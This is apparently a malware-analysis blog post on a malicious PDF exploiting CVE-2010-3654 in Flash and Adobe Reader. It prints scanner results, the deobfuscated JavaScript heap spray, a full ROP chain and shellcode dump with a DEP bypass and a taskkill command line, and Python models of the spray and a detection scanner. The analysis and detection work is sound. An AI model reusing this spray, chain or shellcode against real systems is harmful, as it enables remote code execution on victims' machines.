Saturday, November 27, 2010

CVE-2010-3654

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

Description (from MITRE):

Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.


---

PDF structure (uncompressed view, from a PDF object dumper)

PDF Comment %PDF-1.7



PDF Comment %âãÏÓ




obj 26 0

 Type:

 Referencing:


<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



 <<

   /Linearized 1

   /L 241680

   /O 29

   /E 6094

   /N 1

   /T 241354

   /H [ 513 208]

 >>



<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



obj 37 0

 Type: /XRef

 Referencing: 25 0 R, 27 0 R

 Contains stream


<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>


 <<

   /DecodeParms /Columns 4

   /Predictor 12

 >>




PDF file (compressed, as stored on disk; first objects only)

%PDF-1.7

%âãÏÓ

26 0 obj

<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>

endobj

               

37 0 obj

<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>stream

hÞbbd ``b`: $ 

----

VirusTotal analysis (scan dates 2010-11-01 / 2010-11-02)

Antivirus     Version     Last Update     Result

AhnLab-V3     2010.11.02.00     2010.11.01     PDF/Cve-2010-3654

AntiVir     7.10.13.77     2010.11.01     -

Antiy-AVL     2.0.3.7     2010.11.01     Exploit/Win32.CVE-2010-3654

Authentium     5.2.0.5     2010.11.01     -

Avast     4.8.1351.0     2010.11.01     JS:Pdfka-gen

Avast5     5.0.594.0     2010.11.01     JS:Pdfka-gen

AVG     9.0.0.851     2010.11.02     Exploit_c.NLK

BitDefender     7.2     2010.11.02     Exploit.PDF-JS.Gen

CAT-QuickHeal     11.00     2010.10.26     -

ClamAV     0.96.2.0-git     2010.11.02     BC.PDF.Parser-4.MalwareFound

Comodo     6583     2010.11.01     -

DrWeb     5.0.2.03300     2010.11.02     -

Emsisoft     5.0.0.50     2010.11.02     Exploit.Win32.CVE-2010-3654!IK

eSafe     7.0.17.0     2010.11.01     -

eTrust-Vet     36.1.7948     2010.11.01     PDF/CVE-2010-3654!exploit

F-Prot     4.6.2.117     2010.11.01     W32/Heuristic-XEN!Eldorado

F-Secure     9.0.16160.0     2010.11.02     Exploit:W32/Pidief.CSR

Fortinet     4.2.249.0     2010.11.01     JS/Agent.FSH!exploit

GData     21     2010.11.02     Exploit.PDF-JS.Gen

Ikarus     T3.1.1.90.0     2010.11.02     Exploit.Win32.CVE-2010-3654

Jiangmin     13.0.900     2010.11.01     -

K7AntiVirus     9.67.2882     2010.11.01     -

Kaspersky     7.0.0.125     2010.11.01     Exploit.Win32.CVE-2010-3654.a

McAfee     5.400.0.1158     2010.11.02     -

McAfee-GW-Edition     2010.1C     2010.11.01     Heuristic.BehavesLike.PDF.Suspicious.O

Microsoft     1.6301     2010.11.01     Exploit:Win32/Pdfjsc.gen!A

NOD32     5583     2010.11.01     JS/Exploit.Pdfka.OKB

Norman     6.06.10     2010.11.01     JS/CVE-2010-3654.A

nProtect     2010-11-01.01     2010.11.01     Exploit.PDF-JS.Gen

Panda     10.0.2.7     2010.11.01     Exploit/PDF.Flash.A

PCTools     7.0.3.5     2010.11.02     Trojan.Pidief

Prevx     3.0     2010.11.02     -

Rising     22.71.06.04     2010.11.01     -

Sophos     4.59.0     2010.11.02     Troj/SWFLdr-V

Sunbelt     7190     2010.11.02     Exploit.PDF-JS.Gen (v)

SUPERAntiSpyware     4.40.0.1006     2010.11.02     -

Symantec     20101.2.0.161     2010.11.02     Trojan.Pidief

TheHacker     6.7.0.1.075     2010.11.02     -

TrendMicro     9.120.0.1004     2010.11.01     TROJ_PIDIEF.WV

TrendMicro-HouseCall     9.120.0.1004     2010.11.02     TROJ_PIDIEF.WV

VBA32     3.12.14.1     2010.11.01     -

ViRobot     2010.10.4.4074     2010.11.01     PDF.S.Exploit.241679

VirusBuster     12.70.15.0     2010.11.01     -

PEiD: -

packers (F-Prot): XORCrypt

packers (Kaspersky): Swf2Swc

PDFiD:

PDF Header: %PDF-1.7
obj 22
endobj 22
stream 19
endstream 19
xref 0
trailer 0
startxref 2
/Page 1
/Encrypt 0
/ObjStm 5
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Colors > 2^24 0

Note the zeros for /JS, /JavaScript and /RichMedia. PDFiD counts keywords in the raw bytes and does not inflate streams, and this file keeps its objects inside five compressed object streams (/ObjStm 5) with cross-reference streams instead of a classic xref table (xref 0, trailer 0). The JavaScript heap spray and the embedded SWF only become visible after the FlateDecode streams are decompressed, which is what the scanner output below reports.

Document information (scanner output after decompression; object numbers and offsets as reported)

content/type: PDF document, version 1.7

Object 4.0 @ 12391: suspicious.flash Embedded Flash

Object 4.0 @ 12391: flash.exploit CVE-2010-3654

Object 28.0 @ 945: suspicious.obfuscation using unescape

Object 28.0 @ 945: suspicious.string heap spray shellcode

Object 35.0 @ 4944: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
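To show why the raw keyword count and the decompressed scan disagree, here is an added example (written for this page, not a tool from the original post): a scanner that inflates every FlateDecode stream, object streams included, before looking for script keywords and SWF magic. The sample PDF it builds is constructed for the demonstration and is not the malicious file; the object numbers and stream contents in it are made up.

```python
"""Added example, not code from the original post: a deep keyword scan for a PDF.

A PDFiD-style triage counts keywords in the raw file. This scanner also inflates
every FlateDecode stream (object streams included) and looks inside, which is
where JavaScript and an embedded SWF hide from the raw count.
"""
import re
import zlib

KEYWORDS = (b"/JS", b"/JavaScript", b"/RichMedia", b"/OpenAction", b"/AA")
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")   # uncompressed, zlib-compressed, LZMA-compressed SWF

OBJ_HDR = re.compile(rb"(\d+)\s+\d+\s+obj\b")
# direct /Length only; an indirect "/Length 5 0 R" falls back to searching for endstream
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\d|\s+\d+\s+R)")


def iter_streams(data: bytes):
    """Yield (object number, dictionary bytes, raw stream bytes) for every stream object."""
    for m in OBJ_HDR.finditer(data):
        dict_start = m.end()
        s = data.find(b"stream", dict_start)
        e = data.find(b"endobj", dict_start)
        if s < 0 or (0 <= e < s):
            continue                      # this object carries no stream
        dictionary = data[dict_start:s]
        start = s + len(b"stream")
        if data[start:start + 2] == b"\r\n":
            start += 2
        elif data[start:start + 1] == b"\n":
            start += 1
        lm = LENGTH_RE.search(dictionary)
        end = start + int(lm.group(1)) if lm else data.find(b"endstream", start)
        yield int(m.group(1)), dictionary, data[start:end]


def raw_keyword_count(data: bytes) -> dict:
    """What a keyword counter that never decompresses sees."""
    return {kw.decode(): data.count(kw) for kw in KEYWORDS}


def scan_pdf(data: bytes) -> dict:
    """Raw counts plus counts inside inflated streams, and the objects whose body is a SWF."""
    counts = raw_keyword_count(data)
    swf_objects = []
    for objnum, dictionary, raw in iter_streams(data):
        body = raw
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(raw)
            except zlib.error:
                continue                  # corrupt or truncated stream: nothing more to see
            for kw in KEYWORDS:           # uncompressed bodies were already counted in the raw pass
                counts[kw.decode()] += body.count(kw)
        if body[:3] in SWF_MAGIC:
            swf_objects.append(objnum)
    return {"swf_objects": swf_objects, "keywords": counts}


def build_sample_pdf() -> bytes:
    """Constructed sample: a zlib-compressed SWF stub as an embedded file and a
    JavaScript action hidden inside a compressed object stream."""
    swf = zlib.compress(b"CWS\x0a" + b"\x00" * 32)
    objstm = zlib.compress(b"4 0 <</S/JavaScript/JS(app.alert(1))>>" + b" " * 64)
    parts = [
        b"%PDF-1.7\n",
        b"1 0 obj<</Type/EmbeddedFile/Filter/FlateDecode/Length %d>>stream\n" % len(swf),
        swf, b"\nendstream\nendobj\n",
        b"2 0 obj<</Type/ObjStm/N 1/First 4/Filter/FlateDecode/Length %d>>stream\n" % len(objstm),
        objstm, b"\nendstream\nendobj\n",
        b"3 0 obj<</Type/Catalog/Pages 5 0 R>>endobj\n",
        b"%%EOF\n",
    ]
    return b"".join(parts)


if __name__ == "__main__":
    sample = build_sample_pdf()
    print("raw:", raw_keyword_count(sample))
    print("deep:", scan_pdf(sample))
```

On the sample the raw pass reports 0 for /JS and /JavaScript, exactly like the PDFiD output above, while the deep scan finds both keywords in object 2 and the SWF in object 1. Other filters (LZW, ASCIIHex, RunLength) and encrypted documents are not handled; a real triage should chain the decoders listed in each stream's /Filter array.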



---

Now the exploit itself.

First, the embedded SWF. Its drawing routine is the curvedPolygon sample: Graphics.drawPath() driven by a Vector of path commands and a Vector of coordinates, with the winding rule taken from a radio-button group (ActionScript 3):

function drawLines():void {
    var i:int;
    var n:int = vecPoints.length;
    var vecCmds:Vector.<int> = new Vector.<int>();
    var vecCoords:Vector.<Number> = new Vector.<Number>();

    // flatten the points into an x,y coordinate vector and close the polygon
    for (i = 0; i < n; i++) {
        vecCoords[2*i]   = vecPoints[i].x;
        vecCoords[2*i+1] = vecPoints[i].y;
    }
    vecCoords[2*n]   = vecPoints[0].x;
    vecCoords[2*n+1] = vecPoints[0].y;

    // one command per two coordinate pairs: 3 = GraphicsPathCommand.CURVE_TO
    for (i = 0; i <= (n/2); i++) {
        vecCmds[i] = 3; // This line creates "curveTo" commands
    }
    vecCmds[0] = 1;     // 1 = MOVE_TO for the first point

    shLines.graphics.clear();
    shLines.graphics.lineStyle(1, 0);
    shLines.graphics.beginFill(0xFF0000);
    shLines.graphics.drawPath(vecCmds, vecCoords, vecWind[rbgWind.selectedData]);
    shLines.graphics.endFill();
}


Heap spray (the JavaScript carried in the PDF)

The identifiers are obfuscated: len, s2 and s3 are the strings "length", "substring" and "substr" written as hex escapes, and a() turns a plain hex string into the "%uXXXX" form that unescape() decodes into 16-bit characters. The layout it builds: c is 0x10000 characters of 0x5858 (the value 0x58585858 doubles as the stack-pivot target and, read as x86 code, as a sled of pop eax); b places the ROP chain (the long hex string, elided below) after (0x5858-0x24)/2 characters, so that with a 0x24-byte string header the chain begins at offset 0x5858 inside each 0x10000-byte period; d is cut to exactly one period and doubled to 0x80000 characters (1 MB). The loops then allocate 0x3000 blocks of roughly 64 KB (e), free 15 of every 16 to leave holes, and finally place 0x280 one-megabyte copies of the pattern (_4), so that any 64 KB-aligned block holds the chain at ...5858 and the pivot to 0x58585858 lands on it.

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";             // "length"
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";  // "substring"
var s3 = "\x73\x75\x62\x73\x74\x72";              // "substr"

// hex string -> "%uXXXX%uXXXX..." for unescape()
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}

function s()
{
    c=p(a("58585858"));                        // two characters of 0x5858
    while(c[len] + 20 + 8 < 0x10000) c = c + c; // grow to 0x10000 characters
    b = c[s2](0,(0x5858-0x24)/2);             // filler up to the chain offset
    b += p(a("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")); // ROP chain and shellcode as hex (elided on this page)
    b += c;
    d = b[s2](0,0x10000/2);                   // one 0x10000-byte period
    e = c[s2](0,0x8000-(0x1020-0x08)/2);      // ~64 KB filler block
    while(d[len] < 0x80000) d+=d;             // repeat the period to 1 MB
    _3 = d[s2](0,0x80000-(0x1020-0x08)/2);   // trim so the allocation fits a 1 MB block
    _4 = new Array();
    _5 = new Array();
    for(i=0;i<0x300;i=i+1)
        for(j=0;j<16;j++)
            _5[i*16+j]=e+"y";                 // 0x3000 small blocks; the concatenation forces a fresh copy
    for(i=0;i<0x300;i=i+1)
        for(j=0;j<15;j++)
            _5[i*16+j]=null;                  // free 15 of every 16 to leave holes
    for(i=0;i<0x280;i=i+1) _4[i] = _3 + "s";  // 0x280 one-megabyte spray blocks
}
s();
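The magic numbers in the spray are easier to trust once the layout is modelled. The following is an added example, not code from the original post: it rebuilds one spray block in Python with the script's own constants and checks where the chain ends up. The 0x24-byte string header is the exploit author's assumption about the Reader 9 JavaScript engine and is taken over unverified; SAMPLE_CHAIN stands in for the full chain and holds only its first three dumped dwords (07002FE1, BEEFDEAD, FACEB00B).

```python
"""Added example, not code from the original post: a model of the spray block the
script above builds, used to check where the ROP chain lands.

Constants are the script's own: a 0x10000-byte period, filler 0x58, the chain
placed (0x5858-0x24) bytes into the string data, 1 MB blocks trimmed by 0x1018
bytes. STRING_HEADER (0x24) is the exploit author's assumption, not verified here.
"""
import struct

FILLER = 0x58              # 'X': 0x58585858 is the pivot target and, as x86 code, a `pop eax` sled
UNIT = 0x10000             # bytes per period (d = b.substring(0, 0x10000/2) characters)
STRING_HEADER = 0x24       # assumed bytes between the allocation start and the string data
TARGET = 0x58585858        # address the first gadget must occupy
BIG_BLOCK = 0x80000 * 2 - (0x1020 - 8)   # bytes of string data in one _4[] element

# first three dwords of the dumped chain, little-endian, as a stand-in for the whole chain
SAMPLE_CHAIN = struct.pack("<III", 0x07002FE1, 0xBEEFDEAD, 0xFACEB00B)


def build_unit(chain: bytes) -> bytes:
    """One period: filler up to data offset 0x5834, the chain, filler to 0x10000 bytes."""
    pad = bytes([FILLER]) * (TARGET % UNIT - STRING_HEADER)
    return (pad + chain + bytes([FILLER]) * UNIT)[:UNIT]


def build_big_block(chain: bytes) -> bytes:
    """One _4[i] string: the period doubled to 1 MB, then trimmed like
    _3 = d.substring(0, 0x80000 - (0x1020-8)/2)."""
    data = build_unit(chain)
    while len(data) < 0x80000 * 2:       # while (d.length < 0x80000) d += d;  length counts 2-byte chars
        data += data
    return data[:BIG_BLOCK]


def chain_offsets(block: bytes, chain: bytes) -> list:
    """Every data offset at which the chain begins."""
    offsets, i = [], block.find(chain)
    while i != -1:
        offsets.append(i)
        i = block.find(chain, i + 1)
    return offsets


def lands_on_chain(block_base: int, chain: bytes, block: bytes) -> bool:
    """True if TARGET points at the first chain byte when this block's string
    data starts at block_base + STRING_HEADER."""
    off = TARGET - (block_base + STRING_HEADER)
    return 0 <= off < len(block) and block[off:off + len(chain)] == chain


if __name__ == "__main__":
    blk = build_big_block(SAMPLE_CHAIN)
    print(hex(len(blk)), [hex(o) for o in chain_offsets(blk, SAMPLE_CHAIN)])
    for base in (0x58580000, 0x58500000, 0x58580100):
        print(hex(base), lands_on_chain(base, SAMPLE_CHAIN, blk))
```

The block is 0x100000-0x1018 bytes long and contains the chain sixteen times, always at 0x5834 into a period, which is 0x5858 from the allocation start once the assumed header is added. Any 64 KB-aligned block base therefore puts a copy of the chain at an address ending in 5858, which is why 0x58585858 is both the filler and the pivot target; a base that is off by as little as 0x100 misses it, so the spray relies on large allocations being 64 KB-aligned.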


The exploit uses ROP. Below is the chain as it sits in the sprayed block at 0x58585858, dumped from the debugger. A few things can be read straight off it:

- Every gadget address is BIB.0700xxxx: BIB.dll, a Reader 9 module that was not built for ASLR, mapped at 0x07000000, is the only source of gadgets, so the chain is tied to one BIB.dll build.
- At 585858E0 the chain loads 7FFE0300, the SharedUserData system-call stub pointer on 32-bit Windows XP; calling through it issues a raw syscall without resolving any ntdll export. The six dwords at 58585910 are the argument frame: FFFFFFFF (current process), a pointer for the base address, 0 (ZeroBits), a pointer to the region size, 00001000 (MEM_COMMIT) and 00000040 (PAGE_EXECUTE_READWRITE), i.e. NtAllocateVirtualMemory for one RWX page: the DEP bypass.
- From 5858592C the pattern 070015BB / data dword / 0700154D / 0700A722 repeats: a write-dword loop that stores the data dwords (9054905A, 5815EB5A, 18891A8B, ...) into the new page. Those bytes decode to a small stub containing a copy loop (mov ebx,[edx]; mov [eax],ebx; add eax,4; add edx,4; cmp ebx,0x0C0C0C0C; jnz) with 0C0C0C0C as its end marker, which is also the last dword of the dump, so the stub moves the main shellcode that follows the chain into executable memory.
- The tail (58585F9C onwards) is plain data, read as little-endian ASCII: "kernel32", "shell32", "open", "~temp.bat", "~.exe" and the command line ping 127.0.0.1 -n 3 & taskkill /im Acrobat.exe /f & taskkill /im AcroRd32.exe /f & "...

58585854   58585858

58585858   07002FE1  BIB.07002FE1

5858585C   BEEFDEAD

58585860   FACEB00B

58585864   58585868

58585868   07004919  BIB.07004919

5858586C   CCCCCCCC

58585870   070048EF  BIB.070048EF   

58585874   0700156F  BIB.0700156F

58585878   CCCCCCCC

5858587C   07009084  BIB.07009084

58585880   07009084  BIB.07009084

58585884   07009084  BIB.07009084

58585888   07009084  BIB.07009084

5858588C   07009084  BIB.07009084

58585890   07009084  BIB.07009084

58585894   07009033  BIB.07009033

58585898   07009084  BIB.07009084

5858589C   0C0C0C0C 

585858A0   07009084  BIB.07009084

585858A4   07009084  BIB.07009084

585858A8   07009084  BIB.07009084

585858AC   07009084  BIB.07009084

585858B0   07009084  BIB.07009084

585858B4   07009084  BIB.07009084

585858B8   07009084  BIB.07009084

585858BC   07009084  BIB.07009084

585858C0   07001599  BIB.07001599

585858C4   00010124  UNICODE "Q:="

585858C8   070072F7  BIB.070072F7

585858CC   00010104  UNICODE "=N:="

585858D0   070015BB  BIB.070015BB

585858D4   00001000

585858D8   0700154D  BIB.0700154D

585858DC   070015BB  BIB.070015BB

585858E0   7FFE0300

585858E4   07007FB2  BIB.07007FB2

585858E8   070015BB  BIB.070015BB

585858EC   00010011

585858F0   0700A8AC  BIB.0700A8AC

585858F4   070015BB  BIB.070015BB

585858F8   00010100

585858FC   0700A8AC  BIB.0700A8AC

58585900   070072F7  BIB.070072F7

58585904   00010011

58585908   070052E2  BIB.070052E2

5858590C   07005C54  BIB.07005C54

58585910   FFFFFFFF

58585914   00010100

58585918   00000000

5858591C   00010104  UNICODE "=N:="

58585920   00001000

58585924   00000040

58585928   0700D731  BIB.0700D731

5858592C   070015BB  BIB.070015BB

58585930   9054905A

58585934   0700154D  BIB.0700154D

58585938   0700A722  BIB.0700A722

5858593C   070015BB  BIB.070015BB

58585940   5815EB5A 

58585944   0700154D  BIB.0700154D

58585948   0700A722  BIB.0700A722

5858594C   070015BB  BIB.070015BB

58585950   18891A8B

58585954   0700154D  BIB.0700154D

58585958   0700A722  BIB.0700A722

5858595C   070015BB  BIB.070015BB

58585960   8304C083

58585964   0700154D  BIB.0700154D

58585968   0700A722  BIB.0700A722

5858596C   070015BB  BIB.070015BB

58585970   FB8104C2

58585974   0700154D  BIB.0700154D

58585978   0700A722  BIB.0700A722

5858597C   070015BB  BIB.070015BB

58585980   0C0C0C0C 

58585984   0700154D  BIB.0700154D

58585988   0700A722  BIB.0700A722

5858598C   070015BB  BIB.070015BB

58585990   05EBEE75 

58585994   0700154D  BIB.0700154D

58585998   0700A722  BIB.0700A722

5858599C   070015BB  BIB.070015BB

585859A0   FFFFE6E8

585859A4   0700154D  BIB.0700154D

585859A8   0700A722  BIB.0700A722

585859AC   070015BB  BIB.070015BB

585859B0   909090FF

585859B4   0700154D  BIB.0700154D

585859B8   0700A722  BIB.0700A722

585859BC   070015BB  BIB.070015BB

585859C0   90909090

585859C4   0700154D  BIB.0700154D

585859C8   0700A722  BIB.0700A722

585859CC   070015BB  BIB.070015BB

585859D0   90909090

585859D4   0700154D  BIB.0700154D

585859D8   0700A722  BIB.0700A722

585859DC   070015BB  BIB.070015BB

585859E0   90FFFFFF

585859E4   0700154D  BIB.0700154D

585859E8   0700D731  BIB.0700D731

585859EC   0700112F  BIB.0700112F

585859F0   90909090

585859F4   00052FE9

585859F8   C08BC300

585859FC   02EBD233

58585A00   38804240 

58585A04   8BF97500

58585A08   C08BC3C2

58585A0C   24048951

58585A10   088804EB

58585A14   0A8A4240

58585A18   F675C984

58585A1C   8B0000C6

58585A20   C35A2404

58585A24   01BE5756  AcroRd_1.01BE5756

58585A28   3B000000 

58585A2C   300872D6 

58585A30   3B404608 

58585A34   8BF873D6

58585A38   C35E5FC7

58585A3C   30058B64 

58585A40   85000000

58585A44   8B0E78C0

58585A48   408B0C40

58585A4C   8B008B14

58585A50   10408B00

58585A54   34408BC3 

58585A58   00B8808B  AcroRd_1.00B8808B

58585A5C   90C30000

58585A60   EBD23351

58585A64   C1CA8B16

58585A68   E18303E1

58585A6C   1DEAC1FF

58585A70   D233CA0B

58585A74   CA33108A

58585A78   8040D18B

58585A7C   E5750038

58585A80   8B241489

58585A84   C35A2404

58585A88   83EC8B55

58585A8C   5653E4C4 

58585A90   085D8B57

58585A94   890C458B

58585A98   C38BFC45

58585A9C   4D388166

58585AA0   C2850F5A

58585AA4   8B000000

58585AA8   C3033C40

58585AAC   8BF44589

58585AB0   3881F445 

58585AB4   00004550

58585AB8   00AB850F  AcroRd_1.00AB850F

58585ABC   458B0000

58585AC0   78C083F4

58585AC4   0F003883

58585AC8   00009C84

58585ACC   04788300 

58585AD0   92840F00

58585AD4   8B000000

58585AD8   528BF455

58585ADC   03C38B78

58585AE0   F05589D0

58585AE4   83F0558B

58585AE8   7400187A

58585AEC   F0558B7C

58585AF0   0320528B

58585AF4   E85589D0

58585AF8   8BF0558B

58585AFC   D0032452

58585B00   8BEC5589

58585B04   528BF055

58585B08   89D0031C

58585B0C   458BE455 

58585B10   18788BF0

58585B14   72FF854F

58585B18   F6334750

58585B1C   8BE8458B

58585B20   C303B004

58585B24   FFFF37E8

58585B28   0C453BFF

58585B2C   7D833775

58585B30   1D740010

58585B34   8910458B

58585B38   458BF845 

58585B3C   04B70FEC

58585B40   F0558B70

58585B44   50104203

58585B48   F855FF53

58585B4C   EBFC4589

58585B50   EC458B18

58585B54   7004B70F

58585B58   8BE4558B

58585B5C   C3038204

58585B60   EBFC4589

58585B64   754F4604

58585B68   FC458BB3

58585B6C   8B5B5E5F

58585B70   0CC25DE5

58585B74   00408D00  AcroRd32.00408D00

58585B78   24048951

58585B7C   80400CEB

58585B80   06752238 

58585B84   24048940

58585B88   388005EB 

58585B8C   8BEF7500

58585B90   C35A2404

58585B94   24048951

58585B98   F98009EB

58585B9C   880A7422

58585BA0   8A424008

58585BA4   75C9840A

58585BA8   0000C6F1

58585BAC   5A24048B 

58585BB0   00408DC3  AcroRd32.00408DC3

58585BB4   8DF8C483

58585BB8   33042454 

58585BBC   240C89C9

58585BC0   02EB0289

58585BC4   0A8B02FF

58585BC8   75003980

58585BCC   8B13EBF7

58585BD0   5C39800A 

58585BD4   028B0A75  xpsp2res.028B0A75

58585BD8   FF240489

58585BDC   06EB2404 

58585BE0   023B0AFF

58585BE4   048BE976

58585BE8   C35A5924

58585BEC   51575653 

58585BF0   D88BF98B

58585BF4   8068006A

58585BF8   6A000000

58585BFC   6A006A02

58585C00   00006802

58585C04   FF524000

58585C08   F08B1253

58585C0C   006A006A

58585C10   FF56006A

58585C14   006A2E53

58585C18   0424448D

58585C1C   E8C78B50

58585C20   FFFFFDD8

58585C24   FF565750

58585C28   FF561653

58585C2C   5F5A2253 

58585C30   90C35B5E

58585C34   55575653 

58585C38   FC58C481

58585C3C   4C89FFFF

58585C40   F28B0424

58585C44   8B240489

58585C48   7C83241C  kernel32.7C83241C

58585C4C   75000424

58585C50   24448D23

58585C54   04685018

58585C58   FF000001

58585C5C   448D2A53 

58585C60   8B501804

58585C64   FF4AE8C6

58585C68   D08BFFFF

58585C6C   FD9AE858

58585C70   1CEBFFFF

58585C74   1824448D

58585C78   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585C7C   53FF0000 

58585C80   04448D2A

58585C84   24148B18

58585C88   E869C283

58585C8C   FFFFFD7C

58585C90   8068006A

58585C94   6A000000

58585C98   6A006A03

58585C9C   00006801

58585CA0   FF568000

58585CA4   F08B1253

58585CA8   8068006A

58585CAC   6A000000

58585CB0   6A006A02

58585CB4   00006802

58585CB8   448D4000 

58585CBC   FF503024

58585CC0   E88B1253

58585CC4   7C83FF33  kernel32.7C83FF33

58585CC8   75010424

58585CCC   6A006A0E

58585CD0   4E438B00

58585CD4   53FF5650 

58585CD8   6A0FEB2E

58585CDC   8B006A00

58585CE0   43034E43

58585CE4   FF565052

58585CE8   006A2E53

58585CEC   006A006A

58585CF0   2E53FF55

58585CF4   0424448B

58585CF8   7201E883

58585CFC   BB850F57

58585D00   6A000000

58585D04   24448D00

58585D08   90685018

58585D0C   8D000001

58585D10   01242484  AcroRd_1.01242484

58585D14   56500000 

58585D18   8D1A53FF

58585D1C   01182484  ASCII "in control of the screen. Your keyboard and mouse input will now affect the sharer's desktop."

58585D20   4B8A0000

58585D24   0190BA56  AcroRd_1.0190BA56

58585D28   F5E80000

58585D2C   6AFFFFFC

58585D30   24448D00

58585D34   90685018

58585D38   8D000001

58585D3C   01242484  AcroRd_1.01242484

58585D40   55500000 

58585D44   811653FF

58585D48   000190C7

58585D4C   527B3B00 

58585D50   6AEBB172

58585D54   006A006A

58585D58   008A7568

58585D5C   53FF5600 

58585D60   8D006A2E

58585D64   50182444

58585D68   448D046A 

58585D6C   56501824 

58585D70   6A1A53FF

58585D74   8B006A00

58585D78   43034E43

58585D7C   FF565052

58585D80   006A2E53

58585D84   1824448D

58585D88   8D016A50

58585D8C   501C2444 

58585D90   1A53FF56

58585D94   1024448D

58585D98   BA564B8A

58585D9C   00000001

58585DA0   FFFC7FE8

58585DA4   8D006AFF

58585DA8   50182444

58585DAC   448D016A 

58585DB0   55501C24 

58585DB4   471653FF

58585DB8   0C247C3B

58585DBC   FF56C472

58585DC0   FF552253

58585DC4   448B2253

58585DC8   E8830424

58585DCC   0F0B7201

58585DD0   00009084

58585DD4   009FE900  RETURN to AcroRd_1.009FE900 from AcroRd_1.009FF9D6

58585DD8   538D0000 

58585DDC   24848D74

58585DE0   000002A8

58585DE4   FFFC23E8

58585DE8   74438DFF

58585DEC   FFFC0BE8

58585DF0   04848DFF

58585DF4   000002A8

58585DF8   1824548D

58585DFC   FFFC0BE8

58585E00   74438DFF

58585E04   FFFBF3E8

58585E08   8DF08BFF

58585E0C   E8182444

58585E10   FFFFFBE8

58585E14   848DF003

58585E18   0002A834

58585E1C   CA938D00

58585E20   E8000000

58585E24   FFFFFBE4

58585E28   1824448D

58585E2C   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585E30   53FF0000 

58585E34   04448D2A

58585E38   5F538D18 

58585E3C   FFFBCBE8

58585E40   248C8DFF

58585E44   000002A8

58585E48   1824548D

58585E4C   E824048B

58585E50   FFFFFD98

58585E54   448D006A 

58585E58   FF501C24

58585E5C   006A2653

58585E60   EB3653FF

58585E64   6A016A14

58585E68   8D006A00

58585E6C   50242444 

58585E70   505A438D 

58585E74   53FF006A 

58585E78   24448A46

58585E7C   A8C48108

58585E80   5D000003 

58585E84   C35B5E5F

58585E88   55575653 

58585E8C   8DF4C483

58585E90   C604246C

58585E94   8B002404

58585E98   FB9EE8D8

58585E9C   F88BFFFF

58585EA0   438B006A

58585EA4   E857500E

58585EA8   FFFFFBDC

58585EAC   7389F08B

58585EB0   74F6850E

58585EB4   438B5667

58585EB8   E857500A

58585EBC   FFFFFBC8

58585EC0   830A4389

58585EC4   74000A7B

58585EC8   01438D53  ASCII "@ZU?$less@G@std@@V?$ASAllocator@U?$pair@$$CBGP8Acrobat@AFModel@@AEXABVVal@AFFramework@@@Z@std@@@@$0A@@std@@@std@@"

58585ECC   EB004589

58585ED0   00458B42

58585ED4   FFFB23E8

58585ED8   244489FF

58585EDC   00458B08

58585EE0   0A53FF50

58585EE4   448BF88B

58585EE8   01400824  AcroRd_1.01400824

58585EEC   14EB0045

58585EF0   500E438B

58585EF4   8DE85756

58585EF8   8BFFFFFB

58585EFC   02890055  xpsp2res.02890055

58585F00   04004583 

58585F04   8B00458B

58585F08   75F68530

58585F0C   004583E3

58585F10   800BFE04

58585F14   B977003B

58585F18   012404C6  ASCII "Resolution"

58585F1C   8324048A

58585F20   5F5D0CC4 

58585F24   90C35B5E

58585F28   81EC8B55

58585F2C   FFFE00C4

58585F30   0000E8FF

58585F34   2D580000

58585F38   00403E46  AcroRd32.00403E46

58585F3C   B8FC4589

58585F40   00403EAC  AcroRd32.00403EAC

58585F44   89FC4503

58585F48   458BF845 

58585F4C   FF36E8F8

58585F50   C084FFFF

58585F54   458B4074

58585F58   3250FFF8 

58585F5C   FFFC17E8

58585F60   FC12E8FF

58585F64   D08BFFFF

58585F68   FE03858D

58585F6C   21E8FFFF 

58585F70   8DFFFFFC

58585F74   FFFE0395

58585F78   0001B9FF

58585F7C   458B0000

58585F80   FCAEE8F8

58585F84   958DFFFF

58585F88   FFFFFE03

58585F8C   458BC933 

58585F90   FC9EE8F8

58585F94   E58BFFFF

58585F98   C08BC35D

58585F9C   72656B02

58585FA0   336C656E 

58585FA4   FD890032

58585FA8   9B84A412

58585FAC   2A7AF250

58585FB0   C54538C6

58585FB4   554558D8

58585FB8   EFE70BE2

58585FBC   D6169554

58585FC0   F74BC0D6

58585FC4   DC95016E

58585FC8   FD70B929

58585FCC   23B7A9D1

58585FD0   2CB9C8AF

58585FD4   0000E6FF

58585FD8   68730000

58585FDC   336C6C65 

58585FE0   41930032

58585FE4   00004574

58585FE8   8A700000

58585FEC   58000000 

58585FF0   007B0002

58585FF4   706F0000

